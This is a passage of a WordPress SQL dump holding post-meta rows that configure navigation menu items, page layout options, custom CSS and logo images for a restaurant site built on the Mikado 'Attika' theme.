5005,3999,'_menu_item_xfn',''),(45006,3999,'_menu_item_url','#'),(45007,3999,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45008,3999,'_menu_item_icon','null'),(45009,4000,'_menu_item_type','custom'),(45010,4000,'_menu_item_menu_item_parent','0'),(45011,4000,'_menu_item_object_id','4000'),(45012,4000,'_menu_item_object','custom'),(45013,4000,'_menu_item_target',''),(45014,4000,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45015,4000,'_menu_item_xfn',''),(45016,4000,'_menu_item_url','#'),(45017,4000,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45018,4000,'_menu_item_type_menu','wide'),(45019,4000,'_menu_item_icon','null'),(45020,4001,'_menu_item_type','custom'),(45021,4001,'_menu_item_menu_item_parent','0'),(45022,4001,'_menu_item_object_id','4001'),(45023,4001,'_menu_item_object','custom'),(45024,4001,'_menu_item_target',''),(45025,4001,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45026,4001,'_menu_item_xfn',''),(45027,4001,'_menu_item_url','#'),(45028,4001,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45029,4002,'_menu_item_type','custom'),(45030,4002,'_menu_item_menu_item_parent','0'),(45031,4002,'_menu_item_object_id','4002'),(45032,4002,'_menu_item_object','custom'),(45033,4002,'_menu_item_target',''),(45034,4002,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45035,4002,'_menu_item_xfn',''),(45036,4002,'_menu_item_url','#'),(45037,4002,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45038,4003,'_menu_item_type','custom'),(45039,4003,'_menu_item_menu_item_parent','0'),(45040,4003,'_menu_item_object_id','4003'),(45041,4003,'_menu_item_object','custom'),(45042,4003,'_menu_item_target',''),(45043,4003,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45044,4003,'_menu_item_xfn',''),(45045,4003,'_menu_item_url','#'),(45046,4003,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45047,4004,'_menu_item_type','custom'),(45048,4004,'_menu_item_menu_item_parent','0'),(45049,4004,'_menu_item_object_id','4004'),(45050,4004,'_menu_item_object','custom'),(45051,4004,'_menu_item_target',''),(45052,4004,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45053,4004,'_menu_item_xfn',''),(45054,4004,'_menu_item_url','#'),(45055,4004,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45056,4005,'_menu_item_type','custom'),(45057,4005,'_menu_item_menu_item_parent','0'),(45058,4005,'_menu_item_object_id','4005'),(45059,4005,'_menu_item_object','custom'),(45060,4005,'_menu_item_target',''),(45061,4005,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45062,4005,'_menu_item_xfn',''),(45063,4005,'_menu_item_url','#'),(45064,4005,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45065,4006,'_menu_item_type','custom'),(45066,4006,'_menu_item_menu_item_parent','0'),(45067,4006,'_menu_item_object_id','4006'),(45068,4006,'_menu_item_object','custom'),(45069,4006,'_menu_item_target',''),(45070,4006,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45071,4006,'_menu_item_xfn',''),(45072,4006,'_menu_item_url','#'),(45073,4006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45074,4007,'_menu_item_type','custom'),(45075,4007,'_menu_item_menu_item_parent','0'),(45076,4007,'_menu_item_object_id','4007'),(45077,4007,'_menu_item_object','custom'),(45078,4007,'_menu_item_target',''),(45079,4007,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45080,4007,'_menu_item_xfn',''),(45081,4007,'_menu_item_url','#'),(45082,4007,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45083,4008,'_menu_item_type','custom'),(45084,4008,'_menu_item_menu_item_parent','0'),(45085,4008,'_menu_item_object_id','4008'),(45086,4008,'_menu_item_object','custom'),(45087,4008,'_menu_item_target',''),(45088,4008,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45089,4008,'_menu_item_xfn',''),(45090,4008,'_menu_item_url','#'),(45091,4008,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45092,4009,'_menu_item_type','custom'),(45093,4009,'_menu_item_menu_item_parent','0'),(45094,4009,'_menu_item_object_id','4009'),(45095,4009,'_menu_item_object','custom'),(45096,4009,'_menu_item_target',''),(45097,4009,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45098,4009,'_menu_item_xfn',''),(45099,4009,'_menu_item_url','#'),(45100,4009,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45101,4010,'_menu_item_type','custom'),(45102,4010,'_menu_item_menu_item_parent','3992'),(45103,4010,'_menu_item_object_id','4010'),(45104,4010,'_menu_item_object','custom'),(45105,4010,'_menu_item_target',''),(45106,4010,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45107,4010,'_menu_item_xfn',''),(45108,4010,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(45109,4010,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45110,4010,'_menu_item_icon','null'),(45111,4011,'_menu_item_type','custom'),(45112,4011,'_menu_item_menu_item_parent','3992'),(45113,4011,'_menu_item_object_id','4011'),(45114,4011,'_menu_item_object','custom'),(45115,4011,'_menu_item_target',''),(45116,4011,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45117,4011,'_menu_item_xfn',''),(45118,4011,'_menu_item_url','#'),(45119,4011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45120,4011,'_menu_item_icon','null'),(45121,4012,'_menu_item_type','custom'),(45122,4012,'_menu_item_menu_item_parent','3992'),(45123,4012,'_menu_item_object_id','4012'),(45124,4012,'_menu_item_object','custom'),(45125,4012,'_menu_item_target',''),(45126,4012,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45127,4012,'_menu_item_xfn',''),(45128,4012,'_menu_item_url','#'),(45129,4012,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45130,4012,'_menu_item_icon','null'),(45131,4013,'_menu_item_type','custom'),(45132,4013,'_menu_item_menu_item_parent','3998'),(45133,4013,'_menu_item_object_id','4013'),(45134,4013,'_menu_item_object','custom'),(45135,4013,'_menu_item_target',''),(45136,4013,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45137,4013,'_menu_item_xfn',''),(45138,4013,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(45139,4013,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45140,4013,'_menu_item_icon','null'),(45141,4014,'_menu_item_type','custom'),(45142,4014,'_menu_item_menu_item_parent','3998'),(45143,4014,'_menu_item_object_id','4014'),(45144,4014,'_menu_item_object','custom'),(45145,4014,'_menu_item_target',''),(45146,4014,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45147,4014,'_menu_item_xfn',''),(45148,4014,'_menu_item_url','#'),(45149,4014,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45150,4014,'_menu_item_icon','null'),(45151,4015,'_menu_item_type','custom'),(45152,4015,'_menu_item_menu_item_parent','3998'),(45153,4015,'_menu_item_object_id','4015'),(45154,4015,'_menu_item_object','custom'),(45155,4015,'_menu_item_target',''),(45156,4015,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45157,4015,'_menu_item_xfn',''),(45158,4015,'_menu_item_url','#'),(45159,4015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45160,4015,'_menu_item_icon','null'),(45161,4016,'_menu_item_type','custom'),(45162,4016,'_menu_item_menu_item_parent','4003'),(45163,4016,'_menu_item_object_id','4016'),(45164,4016,'_menu_item_object','custom'),(45165,4016,'_menu_item_target',''),(45166,4016,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45167,4016,'_menu_item_xfn',''),(45168,4016,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(45169,4016,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45170,4017,'_menu_item_type','custom'),(45171,4017,'_menu_item_menu_item_parent','4008'),(45172,4017,'_menu_item_object_id','4017'),(45173,4017,'_menu_item_object','custom'),(45174,4017,'_menu_item_target',''),(45175,4017,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45176,4017,'_menu_item_xfn',''),(45177,4017,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(45178,4017,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45179,4018,'_menu_item_type','custom'),(45180,4018,'_menu_item_menu_item_parent','3994'),(45181,4018,'_menu_item_object_id','4018'),(45182,4018,'_menu_item_object','custom'),(45183,4018,'_menu_item_target',''),(45184,4018,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45185,4018,'_menu_item_xfn',''),(45186,4018,'_menu_item_url','#'),(45187,4018,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45188,4018,'_menu_item_icon','null'),(45189,4019,'_menu_item_type','custom'),(45190,4019,'_menu_item_menu_item_parent','3994'),(45191,4019,'_menu_item_object_id','4019'),(45192,4019,'_menu_item_object','custom'),(45193,4019,'_menu_item_target',''),(45194,4019,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45195,4019,'_menu_item_xfn',''),(45196,4019,'_menu_item_url','#'),(45197,4019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45198,4019,'_menu_item_icon','null'),(45199,4020,'_menu_item_type','custom'),(45200,4020,'_menu_item_menu_item_parent','3994'),(45201,4020,'_menu_item_object_id','4020'),(45202,4020,'_menu_item_object','custom'),(45203,4020,'_menu_item_target',''),(45204,4020,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45205,4020,'_menu_item_xfn',''),(45206,4020,'_menu_item_url','#'),(45207,4020,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45208,4020,'_menu_item_icon','null'),(45209,4021,'_menu_item_type','custom'),(45210,4021,'_menu_item_menu_item_parent','3994'),(45211,4021,'_menu_item_object_id','4021'),(45212,4021,'_menu_item_object','custom'),(45213,4021,'_menu_item_target',''),(45214,4021,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45215,4021,'_menu_item_xfn',''),(45216,4021,'_menu_item_url','#'),(45217,4021,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45218,4021,'_menu_item_icon','null'),(45219,4022,'_menu_item_type','custom'),(45220,4022,'_menu_item_menu_item_parent','4000'),(45221,4022,'_menu_item_object_id','4022'),(45222,4022,'_menu_item_object','custom'),(45223,4022,'_menu_item_target',''),(45224,4022,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45225,4022,'_menu_item_xfn',''),(45226,4022,'_menu_item_url','#'),(45227,4022,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45228,4022,'_menu_item_icon','null'),(45229,4023,'_menu_item_type','custom'),(45230,4023,'_menu_item_menu_item_parent','4000'),(45231,4023,'_menu_item_object_id','4023'),(45232,4023,'_menu_item_object','custom'),(45233,4023,'_menu_item_target',''),(45234,4023,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45235,4023,'_menu_item_xfn',''),(45236,4023,'_menu_item_url','#'),(45237,4023,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45238,4023,'_menu_item_icon','null'),(45239,4024,'_menu_item_type','custom'),(45240,4024,'_menu_item_menu_item_parent','4000'),(45241,4024,'_menu_item_object_id','4024'),(45242,4024,'_menu_item_object','custom'),(45243,4024,'_menu_item_target',''),(45244,4024,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45245,4024,'_menu_item_xfn',''),(45246,4024,'_menu_item_url','#'),(45247,4024,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45248,4024,'_menu_item_icon','null'),(45249,4025,'_menu_item_type','custom'),(45250,4025,'_menu_item_menu_item_parent','4000'),(45251,4025,'_menu_item_object_id','4025'),(45252,4025,'_menu_item_object','custom'),(45253,4025,'_menu_item_target',''),(45254,4025,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45255,4025,'_menu_item_xfn',''),(45256,4025,'_menu_item_url','#'),(45257,4025,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45258,4025,'_menu_item_icon','null'),(45259,4026,'_menu_item_type','custom'),(45260,4026,'_menu_item_menu_item_parent','3993'),(45261,4026,'_menu_item_object_id','4026'),(45262,4026,'_menu_item_object','custom'),(45263,4026,'_menu_item_target',''),(45264,4026,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45265,4026,'_menu_item_xfn',''),(45266,4026,'_menu_item_url','#'),(45267,4026,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45268,4026,'_menu_item_icon','null'),(45269,4027,'_menu_item_type','custom'),(45270,4027,'_menu_item_menu_item_parent','3999'),(45271,4027,'_menu_item_object_id','4027'),(45272,4027,'_menu_item_object','custom'),(45273,4027,'_menu_item_target',''),(45274,4027,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45275,4027,'_menu_item_xfn',''),(45276,4027,'_menu_item_url','#'),(45277,4027,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45278,4027,'_menu_item_icon','null'),(45279,4028,'_menu_item_type','custom'),(45280,4028,'_menu_item_menu_item_parent','3991'),(45281,4028,'_menu_item_object_id','4028'),(45282,4028,'_menu_item_object','custom'),(45283,4028,'_menu_item_target',''),(45284,4028,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45285,4028,'_menu_item_xfn',''),(45286,4028,'_menu_item_url','#'),(45287,4028,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45288,4028,'_menu_item_icon','null'),(45289,4029,'_menu_item_type','custom'),(45290,4029,'_menu_item_menu_item_parent','3997'),(45291,4029,'_menu_item_object_id','4029'),(45292,4029,'_menu_item_object','custom'),(45293,4029,'_menu_item_target',''),(45294,4029,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45295,4029,'_menu_item_xfn',''),(45296,4029,'_menu_item_url','#'),(45297,4029,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45298,4029,'_menu_item_icon','null'),(45299,4030,'_menu_item_type','custom'),(45300,4030,'_menu_item_menu_item_parent','3993'),(45301,4030,'_menu_item_object_id','4030'),(45302,4030,'_menu_item_object','custom'),(45303,4030,'_menu_item_target',''),(45304,4030,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45305,4030,'_menu_item_xfn',''),(45306,4030,'_menu_item_url','#'),(45307,4030,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45308,4030,'_menu_item_icon','null'),(45309,4031,'_menu_item_type','custom'),(45310,4031,'_menu_item_menu_item_parent','3993'),(45311,4031,'_menu_item_object_id','4031'),(45312,4031,'_menu_item_object','custom'),(45313,4031,'_menu_item_target',''),(45314,4031,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45315,4031,'_menu_item_xfn',''),(45316,4031,'_menu_item_url','#'),(45317,4031,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45318,4031,'_menu_item_icon','null'),(45319,4032,'_menu_item_type','custom'),(45320,4032,'_menu_item_menu_item_parent','0'),(45321,4032,'_menu_item_object_id','4032'),(45322,4032,'_menu_item_object','custom'),(45323,4032,'_menu_item_target',''),(45324,4032,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45325,4032,'_menu_item_xfn',''),(45326,4032,'_menu_item_url','#'),(45327,4032,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45328,4033,'_menu_item_type','custom'),(45329,4033,'_menu_item_menu_item_parent','3997'),(45330,4033,'_menu_item_object_id','4033'),(45331,4033,'_menu_item_object','custom'),(45332,4033,'_menu_item_target',''),(45333,4033,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45334,4033,'_menu_item_xfn',''),(45335,4033,'_menu_item_url','#'),(45336,4033,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45337,4033,'_menu_item_icon','null'),(45338,4034,'_menu_item_type','custom'),(45339,4034,'_menu_item_menu_item_parent','3997'),(45340,4034,'_menu_item_object_id','4034'),(45341,4034,'_menu_item_object','custom'),(45342,4034,'_menu_item_target',''),(45343,4034,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(45344,4034,'_menu_item_xfn',''),(45345,4034,'_menu_item_url','#'),(45346,4034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45347,4034,'_menu_item_icon','null'),(45348,2,'_wp_page_template','default'),(45349,3,'_wp_page_template','default'),(45350,3034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45351,3034,'_wp_page_template','default'),(45352,3034,'slide_template','default'),(45353,3034,'_wpb_vc_js_status','false'),(45354,3034,'mkdf_page_content_behind_header_meta','no'),(45355,3034,'mkdf_disable_vertical_header_background_image_meta','no'),(45356,3034,'mkdf_disable_header_widget_areas_meta','no'),(45357,3034,'mkdf_title_area_type_meta','attika'),(45358,3034,'mkdf_header_type_meta','header-divided'),(45359,3034,'mkdf_header_behaviour_meta','no-behavior'),(45360,3034,'mkdf_menu_area_background_color_meta','#ffffff'),(45361,3034,'mkdf_sidebar_layout_meta','sidebar-25-right'),(45362,3034,'mkdf_custom_sidebar_area_meta','shop-sidebar'),(45363,3034,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45364,3034,'mkdf_page_content_padding','70px 0 100px'),(45365,3035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45366,3035,'_wp_page_template','default'),(45367,3035,'slide_template','default'),(45368,3035,'_wpb_vc_js_status','false'),(45369,3035,'mkdf_page_content_behind_header_meta','no'),(45370,3035,'mkdf_disable_vertical_header_background_image_meta','no'),(45371,3035,'mkdf_disable_header_widget_areas_meta','no'),(45372,3035,'mkdf_title_area_type_meta','attika'),(45373,3035,'mkdf_page_content_padding','100px 0'),(45374,3035,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45375,3035,'mkdf_menu_area_background_color_meta','#ffffff'),(45376,3036,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45377,3036,'_wp_page_template','default'),(45378,3036,'slide_template','default'),(45379,3036,'_wpb_vc_js_status','false'),(45380,3036,'mkdf_page_content_behind_header_meta','no'),(45381,3036,'mkdf_disable_vertical_header_background_image_meta','no'),(45382,3036,'mkdf_disable_header_widget_areas_meta','no'),(45383,3036,'mkdf_title_area_type_meta','attika'),(45384,3036,'mkdf_menu_area_background_color_meta','#ffffff'),(45385,3036,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45386,3036,'mkdf_page_content_padding','85px 0 30px'),(45387,3037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45388,3037,'_wp_page_template','default'),(45389,3037,'slide_template','default'),(45390,3037,'_wpb_vc_js_status','false'),(45391,3037,'mkdf_page_content_behind_header_meta','no'),(45392,3037,'mkdf_disable_vertical_header_background_image_meta','no'),(45393,3037,'mkdf_disable_header_widget_areas_meta','no'),(45394,3037,'mkdf_title_area_type_meta','attika'),(45395,3037,'mkdf_menu_area_background_color_meta','#ffffff'),(45396,3037,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45397,3037,'mkdf_page_content_padding','120px 0px 86px 0px'),(45398,3038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45399,3038,'_wp_page_template','full-width.php'),(45400,3038,'slide_template','default'),(45401,3038,'_wpb_vc_js_status','true'),(45402,3038,'mkdf_page_content_behind_header_meta','no'),(45403,3038,'mkdf_disable_vertical_header_background_image_meta','no'),(45404,3038,'mkdf_disable_header_widget_areas_meta','no'),(45405,3038,'mkdf_page_content_padding','80px 0 110px'),(45406,3039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45407,3039,'_wp_page_template','full-width.php'),(45408,3039,'slide_template','default'),(45409,3039,'_wpb_vc_js_status','false'),(45410,3039,'mkdf_page_content_behind_header_meta','no'),(45411,3039,'mkdf_disable_vertical_header_background_image_meta','no'),(45412,3039,'mkdf_disable_header_widget_areas_meta','no'),(45413,3040,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45414,3040,'_wp_page_template','full-width.php'),(45415,3040,'slide_template','default'),(45416,3040,'_wpb_vc_js_status','true'),(45417,3040,'mkdf_page_content_behind_header_meta','no'),(45418,3040,'mkdf_page_content_padding','100px 0 0 0'),(45419,3040,'mkdf_page_content_padding_mobile','100px 0 0 0'),(45420,3040,'mkdf_header_type_meta','header-divided'),(45421,3040,'mkdf_disable_vertical_header_background_image_meta','no'),(45422,3040,'mkdf_disable_header_widget_areas_meta','no'),(45423,3040,'mkdf_show_title_area_meta','no'),(45424,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(45425,3040,'mkdf_menu_area_background_color_meta','#f8f2ed'),(45426,3040,'mkdf_menu_area_height_meta','70px'),(45427,3040,'_wpb_post_custom_css','.main-home-first-row {\n    position: relative;\n    z-index: 10;\n}\n.main-home-second-row {\n    position: relative;\n    z-index: 20;\n}'),(45428,3040,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(45429,3040,'mkdf_custom_sticky_menu_area_sidebar_meta','custom-sticky'),(45430,3040,'mkdf_smooth_page_transitions_meta','yes'),(45431,3040,'mkdf_page_transition_preloader_meta','yes'),(45432,3040,'mkdf_smooth_pt_spinner_type_meta','pulse'),(45433,3040,'mkdf_smooth_pt_spinner_color_meta','#000000'),(45434,3041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45435,3041,'_wp_page_template','full-width.php'),(45436,3041,'slide_template','default'),(45437,3041,'_wpb_vc_js_status','true'),(45438,3041,'mkdf_page_content_behind_header_meta','no'),(45439,3041,'mkdf_disable_vertical_header_background_image_meta','no'),(45440,3041,'mkdf_disable_header_widget_areas_meta','yes'),(45441,3041,'mkdf_page_content_padding','0'),(45442,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(45443,3041,'mkdf_show_title_area_meta','no'),(45444,3041,'mkdf_logo_image_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(45445,3041,'mkdf_logo_image_dark_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(45446,3041,'mkdf_logo_image_light_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(45447,3041,'mkdf_logo_image_sticky_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(45448,3041,'mkdf_logo_image_mobile_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(45449,3041,'_wpb_post_custom_css','.mkdf-page-header .mkdf-logo-area .mkdf-logo-wrapper a,\n.mkdf-page-header .mkdf-menu-area .mkdf-logo-wrapper a {\n    max-height: 125px;\n}\n\n@media only screen and (min-width: 1025px) {\n    .home-two-second-row,\n    .home-two-third-row {\n        display: none;\n    }\n}\n\n@media only screen and (max-width: 1024px) {\n    .home-two-first-row {\n        display: none;\n    }\n}'),(45450,3041,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(45451,3041,'mkdf_smooth_page_transitions_meta','yes'),(45452,3041,'mkdf_page_transition_preloader_meta','yes'),(45453,3041,'mkdf_smooth_pt_spinner_type_meta','pulse'),(45454,3041,'mkdf_smooth_pt_spinner_color_meta','#000000'),(45455,3042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45456,3042,'_wp_page_template','full-width.php'),(45457,3042,'slide_template','default'),(45458,3042,'_wpb_vc_js_status','true'),(45459,3042,'mkdf_page_content_behind_header_meta','no'),(45460,3042,'mkdf_disable_vertical_header_background_image_meta','no'),(45461,3042,'mkdf_disable_header_widget_areas_meta','no'),(45462,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(45463,3042,'mkdf_page_content_padding','0'),(45464,3042,'mkdf_header_type_meta','header-bottom'),(45465,3042,'mkdf_show_title_area_meta','no'),(45466,3042,'mkdf_menu_area_side_padding_meta','30px'),(45467,3042,'mkdf_page_slider_meta','[rev_slider alias=\"seafood-restaurant\"]'),(45468,3043,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45469,3043,'_wp_page_template','full-width.php'),(45470,3043,'slide_template','default'),(45471,3043,'_wpb_vc_js_status','true'),(45472,3043,'mkdf_page_content_behind_header_meta','no'),(45473,3043,'mkdf_disable_vertical_header_background_image_meta','no'),(45474,3043,'mkdf_disable_header_widget_areas_meta','no'),(45475,3043,'mkdf_page_content_padding','0'),(45476,3043,'mkdf_header_type_meta','header-divided'),(45477,3043,'mkdf_show_title_area_meta','no'),(45478,3043,'mkdf_menu_area_background_color_meta','#ffffff'),(45479,3043,'mkdf_menu_area_background_transparency_meta','1'),(45480,3043,'mkdf_menu_area_height_meta','80'),(45481,3043,'mkdf_disable_footer_meta','yes'),(45482,3043,'mkdf_header_behaviour_meta','fixed-on-scroll'),(45483,3043,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px 